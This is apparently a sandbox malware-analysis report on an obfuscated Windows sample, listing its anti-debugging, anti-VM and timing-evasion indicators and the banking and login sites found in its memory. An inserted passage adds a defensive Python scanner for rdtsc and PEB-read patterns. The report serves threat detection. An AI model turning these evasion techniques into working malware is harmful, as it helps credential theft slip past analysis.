Source: 0.2.file.exe.4af1228.2.raw.unpack, xrTuJGVU9taKf4nSoGX.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mMxhrughok', 'rFIhbXaMWp', 'LnkhAV197H', 'foMhhSxGdn', 'jbqhMG6bGM', 'XaUhnJfF5P', 'vouh0G3lRh'
Source: 0.2.file.exe.4af1228.2.raw.unpack, IB2k7n2T1BIPg3qqH6.cs | High entropy of concatenated method names: 'OOTrmDot8b', 'qWQrjGruXb', 'gXDr691vE4', 'tx0rLxWBmH', 'bsYr3vJQQ9', 'DPyrG0uSi2', 'Xc9rHZMl5d', 'cjHrkrtEHk', 'w1frcYtSk4', 'ut1ru3VS9s'
Source: 0.2.file.exe.4af1228.2.raw.unpack, KSBNsrKqTq8oFUpqsh.cs | High entropy of concatenated method names: 'Q6P8YB4dus', 'NSX8ISddMp', 'Y77CRKpTBd', 'mrACVdl1XE', 'i0s8gBNLPS', 'ukc8XcEFOM', 'zS28wdOaCy', 'xMb8WnDMeg', 'BHa8eKhABY', 'l278o0QJk8'
Source: 0.2.file.exe.4af1228.2.raw.unpack, voKxv5Ev4EKeqhjyDs.cs | High entropy of concatenated method names: 'afA8TnFYto', 'XbK8ODFoAf', 'ToString', 'Jv28qWvHsi', 'zl08SoCrrh', 'dun8yk2Lxm', 'nd08FS0Ipq', 'mVx8lYH6b0', 'bJe8fB4tH7', 'RDP8xxdSN9'
Source: 0.2.file.exe.4af1228.2.raw.unpack, aO7fhHWYjBhdXIOiYt.cs | High entropy of concatenated method names: 'GFtdu8VsP4', 'lONdXWSErg', 'la7dWnbK6g', 'DV6deqmRmh', 'EgfdjJZ1wJ', 'k9xd63GP1u', 'BCqdLCm2fs', 'XC2d3Fk6s0', 'kq7dGXrFOv', 'KohdHHHyJM'
Source: 0.2.file.exe.4af1228.2.raw.unpack, Y8vCQs10HAf48hdxB9.cs | High entropy of concatenated method names: 'ygKrdN36Ws', 'kVxr83oDjN', 'F64rrekcma', 'EtlrA13Tpi', 'vSTrM6mDOL', 'hxrr0VrBfA', 'Dispose', 'tsQCqvffpW', 'TxLCSix1kF', 'g76CyYqYmd'
Source: 0.2.file.exe.4af1228.2.raw.unpack, OHyVr6VBoFwV6wMCpsU.cs | High entropy of concatenated method names: 'ToString', 'NA8AQVue1D', 'FhFAs9qyyl', 'GYZAJP3o4c', 'vwMAmston7', 'ow9AjIwHIm', 'wsMA609EEl', 'dOHALN9djH', 'hYlSGghN3bSWyrfvoNX', 'fgw3T3h6YU410KEkaY3'
Source: 0.2.file.exe.4af1228.2.raw.unpack, cLoHjTw0PFUAEUVPUB.cs | High entropy of concatenated method names: 'lHipQZvFaE', 'drhpsN8NmE', 'X3ppmr2PYh', 'dPxpjm4fB8', 'ww0pLqkQcs', 'd2Gp3U6Nin', 'G7DpHoVWiX', 'm5Mpk5GVss', 'GUopuCkukx', 'U2PpgLHolu'
Source: 0.2.file.exe.4af1228.2.raw.unpack, W3YGtBooICT50ZBVlf.cs | High entropy of concatenated method names: 'ToString', 'ns67gUvavC', 'y9U7jS0pGG', 'Pd976ZU1mE', 'rH47LIkjJQ', 'zmN73eooPy', 'Qgl7GlNAaC', 'FtH7H4Mhhx', 'L2v7kkOCpa', 'JS27cCnjIF'
Source: 0.2.file.exe.4af1228.2.raw.unpack, EGDBtjBVZVVPdpw7hW.cs | High entropy of concatenated method names: 'rWEPMErm9', 'XXIt1EI3A', 'bTOZxRwRq', 'yCj4FUGxT', 'mqCsMsYT8', 'zgeJlPhp7', 'j6XKWQJPPoDaBM8BOk', 'xLSYpvXxvMsLNGI1OD', 'FNBCnr5MO', 'aAIb4E0Oj'
Source: 0.2.file.exe.4af1228.2.raw.unpack, Qn6sd0I6oYNvA1mufo.cs | High entropy of concatenated method names: 'zTabyWutwG', 'YKcbFV4Bgd', 'qwSblFWmx0', 'Njvbfg9XRS', 'QXpbriDTk1', 'SSlbx5uw5E', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.4af1228.2.raw.unpack, GMw5ScVV0XG8ZuIyI8B.cs | High entropy of concatenated method names: 'QAGbI7nP0M', 'UY2bz4psZd', 'rTHARGHjZJ', 'a94AVvYrow', 'ohVABtgFmn', 'Dk4A9xkfE0', 't92AUpZQxU', 'Q35AvwPfXg', 'OaLAqp670X', 'CQ9ASZ74sH'
Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | High entropy of concatenated method names: 'pVO9vq3pT6', 'VB39qhQBD0', 'DKY9SlaPwN', 'jMF9yXTZKA', 'l0G9FU0F2q', 'FWT9l31jA4', 'qEv9fLttdt', 'fWw9xA1RyM', 'vcq9NFHgpu', 'ibQ9TYCjHQ'
Source: 0.2.file.exe.4af1228.2.raw.unpack, Op9oSDQex61ZbKAB8f.cs | High entropy of concatenated method names: 'CsTSW6m5qN', 'JQdSeiX3M8', 'QUBSoXH9wZ', 'MZSSEvw0al', 'gtqSaODao1', 'GIkSKBFMgq', 'vvfS1B3Ent', 'QDPSYS0mh7', 'smwS2qH817', 'IJsSIm0fLd'
Source: 0.2.file.exe.4af1228.2.raw.unpack, xoqIiWzLh8kdieGeYX.cs | High entropy of concatenated method names: 'FIfbZOyCTh', 'N1BbQxTmG7', 'vupbsFwyAK', 'qDEbmHCHBP', 'T8jbjnj9yi', 'O5RbL539qV', 'oFKb3I1kLB', 'wOWb0Qc77X', 'lwvbiw6jyf', 'Gk7bDaBmKK'
Source: 0.2.file.exe.4af1228.2.raw.unpack, mx5JvpHWsXgly5CUUg.cs | High entropy of concatenated method names: 'MTvfq2GbCO', 'r3xfypLjuM', 'KS8flPH3Ub', 'xaElInIY66', 'UialzDNBjH', 'tS8fRJIPT8', 'Cb9fVJCMxF', 'UOTfBPfEmO', 'OXrf9nSQAX', 'ewbfUI58FN'
Source: 0.2.file.exe.4af1228.2.raw.unpack, cOBf4lc7MGSjVT9qOP.cs | High entropy of concatenated method names: 'ua4ficB8g2', 'PJbfDOlP3q', 'YxGfPSrmCM', 'g5MftNvpmx', 'ffIf5XEHIM', 'LEbfZWotj3', 'lJXf4F8DsH', 'wS4fQTfR2V', 'CI9fsrMYAi', 'bQpfJA8hFY'
Source: 0.2.file.exe.4af1228.2.raw.unpack, Aw6dcyJcW2PR2pHFtY.cs | High entropy of concatenated method names: 'eHKF5xsF99', 'w2JF4KrfU5', 'mqMy6bEKCB', 'XUPyLWrltC', 'bNky30WyTw', 'pX4yGi5J09', 'yHeyHLBwEW', 'AQsykio5LW', 'fDAyc6tteq', 'dZVyu0iLny'
Source: 0.2.file.exe.4af1228.2.raw.unpack, ABIClGs886eFR1wbBb.cs | High entropy of concatenated method names: 'LbFytTdoNq', 'QE8yZmbbKJ', 'MFZyQ3SGLL', 'hoAysS88dc', 'KpdydIA82b', 'y2hy7ySQdM', 'XVZy8IHo2R', 'My9yCXKZit', 'F7NyriG7Na', 'OvQybGSAd4'
Source: 0.2.file.exe.4af1228.2.raw.unpack, sMG1qLVRNO0QDq6n28l.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OW3bgp9Q85', 'NlobXPVd9O', 'NDtbwJnIOO', 'YgPbWRQNgp', 'gtLbelnlyB', 'acEboiwNLU', 'RKCbESUWqD'
Source: 0.2.file.exe.4af1228.2.raw.unpack, tJaLrcGPKgemqKlDZQ.cs | High entropy of concatenated method names: 'PGvloMXNft', 'Cm2lEFCSH2', 'YVOlaL5tD9', 'ToString', 'kNdlKTyDWv', 'zmyl1GrBME', 'OLG5ybukF2gPg78wTvq', 'PSFCiLuKJMsXDJM9Ydi', 'HUY4DQuIWWAQDmBlUKO'
Source: 0.2.file.exe.4af1228.2.raw.unpack, tCgYVqSESRwHbwGTvM.cs | High entropy of concatenated method names: 'Dispose', 'tf4V28hdxB', 'DxjBjYTqNO', 'VBEVmgORw8', 'dD3VIIYOSm', 'NlwVzAmCHn', 'ProcessDialogKey', 'iwLBRB2k7n', 'm1BBVIPg3q', 'fH6BBwn6sd'

Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\SndVol.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7448, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\SndVol.exe | API/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\SndVol.exe | API/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\SndVol.exe | API/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\SndVol.exe | API/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\SndVol.exe | API/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\SndVol.exe | API/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\SndVol.exe | API/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\SndVol.exe | API/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 2E70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 3050000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 5050000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 7C40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 8C40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 8DE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 9DE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: A830000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: B830000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: C830000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0175096E rdtsc 4_2_0175096E
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4385
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1243
                Source: C:\Windows\SysWOW64\SndVol.exe | Window / User API: threadDelayed 9841
                Source: C:\Users\user\Desktop\file.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\SndVol.exe | API coverage: 2.7 %
                Source: C:\Users\user\Desktop\file.exe TID: 7472 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2060 | Thread sleep count: 132 > 30
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2060 | Thread sleep time: -264000s >= -30000s
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2060 | Thread sleep count: 9841 > 30
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2060 | Thread sleep time: -19682000s >= -30000s
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616 | Thread sleep time: -75000s >= -30000s
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616 | Thread sleep count: 39 > 30
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616 | Thread sleep time: -58500s >= -30000s
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616 | Thread sleep count: 38 > 30
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616 | Thread sleep time: -38000s >= -30000s
                Source: C:\Windows\SysWOW64\SndVol.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 9_2_030AC7E0 FindFirstFileW,FindNextFileW,FindClose, 9_2_030AC7E0
                Source: 31mF3HIk-.9.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: 31mF3HIk-.9.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: 31mF3HIk-.9.dr | Binary or memory string: tasks.office.comVMware20,11696503903o
                Source: 31mF3HIk-.9.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: SndVol.exe, 00000009.00000002.3771875465.00000000084D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: East & CentralVMware20,11696503903
                Source: 31mF3HIk-.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: 31mF3HIk-.9.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: 31mF3HIk-.9.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: 31mF3HIk-.9.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: 31mF3HIk-.9.dr | Binary or memory string: bankofamerica.comVMware20,11696503903x
                Source: file.exe, 00000000.00000002.1326953013.0000000001319000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: firefox.exe, 0000000C.00000002.1972261321.0000026D56E9C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSSM
                Source: 31mF3HIk-.9.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: 31mF3HIk-.9.dr | Binary or memory string: global block list test formVMware20,11696503903
                Source: 31mF3HIk-.9.dr | Binary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: 31mF3HIk-.9.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: 31mF3HIk-.9.dr | Binary or memory string: interactivebrokers.comVMware20,11696503903
                Source: 31mF3HIk-.9.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: 31mF3HIk-.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: 31mF3HIk-.9.dr | Binary or memory string: AMC password management pageVMware20,11696503903
                Source: 31mF3HIk-.9.dr | Binary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032CB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 31mF3HIk-.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: 31mF3HIk-.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: SndVol.exe, 00000009.00000002.3771875465.00000000084D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,1169650
                Source: file.exe, 00000000.00000002.1326953013.0000000001319000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 31mF3HIk-.9.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: 31mF3HIk-.9.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: SndVol.exe, 00000009.00000002.3771875465.00000000084D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11
                Source: 31mF3HIk-.9.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: 31mF3HIk-.9.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: 31mF3HIk-.9.dr | Binary or memory string: outlook.office365.comVMware20,11696503903t
                Source: 31mF3HIk-.9.dr | Binary or memory string: outlook.office.comVMware20,11696503903s
                Source: 31mF3HIk-.9.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: 31mF3HIk-.9.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: SndVol.exe, 00000009.00000002.3771875465.00000000084D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,1
                Source: CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3767462834.0000000000E19000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                Source: 31mF3HIk-.9.dr | Binary or memory string: dev.azure.comVMware20,11696503903j
                Source: 31mF3HIk-.9.dr | Binary or memory string: discord.comVMware20,11696503903f
                Source: 31mF3HIk-.9.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\SndVol.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0175096E rdtsc
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00417D93 LdrLoadDll
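The rdtsc entry above and the fs:[00000030h] reads listed under the PEB indicator below are what the static pass is flagging. In a 32-bit process the TEB sits at fs:0 and holds the PEB pointer at offset 0x30; code that loads it is usually heading for PEB.BeingDebugged (+0x02), PEB.Ldr (+0x0C, walked by hand-rolled API resolvers that avoid GetProcAddress) or NtGlobalFlag (+0x68). Two rdtsc reads with a subtraction between them are the shape of an execution-timing check. The Python scanner below is an added example, not code from the report or from the sample; it locates those byte patterns in a raw code buffer, renders them in the report's own wording, and pairs nearby rdtsc reads. The bytes it scans are a constructed 32-bit stub, not bytes taken from file.exe.

```python
"""Static triage for the anti-analysis idioms the report flags: rdtsc and
32-bit PEB reads through fs:[30h].  Added example, not report or sample code."""
import struct
from dataclasses import dataclass

RDTSC = b"\x0f\x31"          # rdtsc
FS_PREFIX = 0x64             # segment-override prefix for fs:
PEB_OFFSET_IN_TEB = 0x30     # TEB.ProcessEnvironmentBlock (32-bit TEB)
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


@dataclass
class Hit:
    offset: int
    kind: str       # "rdtsc" or "peb_read"
    text: str       # disassembly-style rendering, matching the report's wording


def _peb_read_at(code: bytes, i: int) -> "Hit | None":
    """Decode a PEB read starting at code[i] (which must be the fs: prefix).

    Two encodings cover what compilers and hand-written stubs emit:
      64 A1 <imm32>        mov eax, dword ptr fs:[imm32]   (moffs form, eax only)
      64 8B /r <disp32>    mov r32, dword ptr fs:[disp32]  (ModRM mod=00 rm=101)
    """
    op = code[i + 1] if i + 1 < len(code) else None
    if op == 0xA1 and i + 6 <= len(code):
        (disp,) = struct.unpack_from("<I", code, i + 2)
        if disp == PEB_OFFSET_IN_TEB:
            return Hit(i, "peb_read", "mov eax, dword ptr fs:[00000030h]")
    if op == 0x8B and i + 7 <= len(code):
        modrm = code[i + 2]
        mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
        if mod == 0 and rm == 5:
            (disp,) = struct.unpack_from("<I", code, i + 3)
            if disp == PEB_OFFSET_IN_TEB:
                return Hit(i, "peb_read", f"mov {REG32[reg]}, dword ptr fs:[00000030h]")
    return None


def scan(code: bytes) -> list[Hit]:
    """Linear byte scan (not a disassembler): collect rdtsc and fs:[30h] reads."""
    hits: list[Hit] = []
    i = 0
    while i < len(code):
        if code[i:i + 2] == RDTSC:
            hits.append(Hit(i, "rdtsc", "rdtsc"))
            i += 2
            continue
        if code[i] == FS_PREFIX:
            hit = _peb_read_at(code, i)
            if hit:
                hits.append(hit)
                i += 6 if code[i + 1] == 0xA1 else 7
                continue
        i += 1
    return hits


def timing_pairs(hits: list[Hit], max_gap: int = 32) -> list[tuple[int, int]]:
    """Two rdtsc reads within max_gap bytes of each other: the shape of an
    execution-timing check (read, do a little work, read again, compare)."""
    offs = [h.offset for h in hits if h.kind == "rdtsc"]
    return [(a, b) for a, b in zip(offs, offs[1:]) if b - a <= max_gap]


def summarize(hits: list[Hit]) -> dict[str, int]:
    """Per-kind counts, the same aggregation the report's indicator list implies."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h.kind] = counts.get(h.kind, 0) + 1
    return counts


# Constructed sample (not bytes from file.exe): a 32-bit stub that reads
# PEB.BeingDebugged and PEB.Ldr, then times a short sequence with rdtsc.
SAMPLE = bytes.fromhex(
    "55 8b ec"               # push ebp; mov ebp, esp
    "64 a1 30 00 00 00"      # mov eax, dword ptr fs:[30h]   ; PEB
    "0f b6 40 02"            # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    "64 8b 0d 30 00 00 00"   # mov ecx, dword ptr fs:[30h]   ; PEB again
    "8b 49 0c"               # mov ecx, [ecx+0Ch]            ; PEB.Ldr
    "0f 31"                  # rdtsc
    "8b d8"                  # mov ebx, eax
    "0f 31"                  # rdtsc
    "2b c3"                  # sub eax, ebx                  ; cycle delta
    "5d c3"                  # pop ebp; ret
)

if __name__ == "__main__":
    found = scan(SAMPLE)
    for h in found:
        print(f"{h.offset:#06x}  {h.kind:<9} {h.text}")
    print("timing pairs:", timing_pairs(found))
    print("summary:", summarize(found))
```

This is a pattern scan, not a disassembler: a byte sequence that straddles an instruction boundary can produce a false positive, 64-bit code reaches the PEB through gs:[60h] instead and is not matched here, and a single fs:[30h] read is routine in CRT and loader code. Treat hits the way the report does, as triage leads to confirm in the disassembly at the listed function address rather than as a verdict on their own.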
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01716154 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01716154 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A4144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A4144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A4144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A4144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A4144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01740124 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BA118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BA118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BA118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BA118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017D0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017BE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017401F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017E61E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0178E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0178E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0178E1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0178E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0178E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017D61C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017D61C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0179019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170A197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01750185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017CC188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017CC188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B4180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B4180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0173C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01712050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01796050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017A6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0170C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0172E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0172E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0172E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0172E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01794000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]
